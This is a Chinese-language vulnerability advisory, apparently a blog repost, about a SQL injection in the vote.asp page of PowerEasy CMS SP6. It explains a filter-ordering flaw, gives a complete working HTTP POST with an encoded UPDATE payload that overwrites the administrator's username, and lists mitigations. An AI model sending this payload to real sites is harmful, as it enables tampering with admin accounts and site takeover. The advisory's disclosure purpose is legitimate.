測試系統:
動易(PowerEasy CMS SP6 071030以下版本)
安全綜述:
動易網站管理系統是一個採用 ASP 和 MSSQL 等其他多種數據庫構建的高效網站內容管理解決方案產品。
漏洞描述:
vote.asp調用了動易組件PE_Site.ShowVote,此組件VoteOption參數過濾不嚴,導致可以進行mssql注入
但是其語句裏面過濾了-- ;等字符,又是一個UPDATE形的注入,有一定的限制。但是其過濾的順序不對。有導致mssql的註釋符號--可以進入語句
測試方法:
POST Vote.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/Vote.asp?ID=2&Action=Show
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1
Content-Length: 160
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http%3A%2F%2Fkw%2Elyedu%2Ecom%2Ecn=lao=8; style=null; chkRemember=false; ASPSESSIONIDSSRCABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1
VoteOption=1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D&VoteType=Multi&Action=Vote&ID=2
其中 1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D解碼後爲
1=1+update PE_Admin set adminname=0x61-;-
他們先過濾了--再過濾; 導致以-;-的形式可以很輕鬆的把註釋符帶入語句,執行語句後,成功把管理員的用戶名設置爲a
解決方案:
更新動易組件(需要管理員的權限才能更新)。
不需要投票功能的用戶,刪除此文件。
有需要,但是又沒有權限更新動易組件(需要管理員的權限才能更新)的用戶。請在vote.asp文件自行過濾各個參數。
2007 10.30動易網站管理系統vote.asp頁面存在SQL注入漏洞
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
關於 script src=http://7o8.net >的解決方案
ifuckyours
2019-02-23 13:40:57
常用SQL注入語句
benxiaohai8
2019-02-22 18:16:47
SQL注入原理和方法
benxiaohai8
2019-02-22 18:16:16
SQL注入中的WAF繞過技術
zhangxiang_414
2019-02-22 16:37:01
Web腳本***之注入***
NECDE
2019-02-22 15:46:50
基於Http Header的SQL注入
nov5mber
2019-02-22 15:44:40
防止sql注入***的方法總結
aliuk
2018-12-19 13:06:13
利用SQL注入獲取服務器最高權限
hamiguazjhz
2018-11-04 02:26:42
攻擊方式學習之SQL注入(SQL Injection)第1/3頁
神馬文庫
2018-10-25 22:04:26
XSS & SQL注入
神馬文庫
2018-10-25 22:04:26
SQL注入 order by後的注入(Less-46)
dawsonenjoy
2018-10-17 06:46:50
SQL注入 HTTP參數污染(HPP)(Less-29)
dawsonenjoy
2018-10-17 06:46:50
SQL注入 當or、and等常用字符被過濾(less-25)
dawsonenjoy
2018-10-17 06:46:50
SQL注入 修改已知用戶的密碼(less-24)
dawsonenjoy
2018-10-17 06:46:50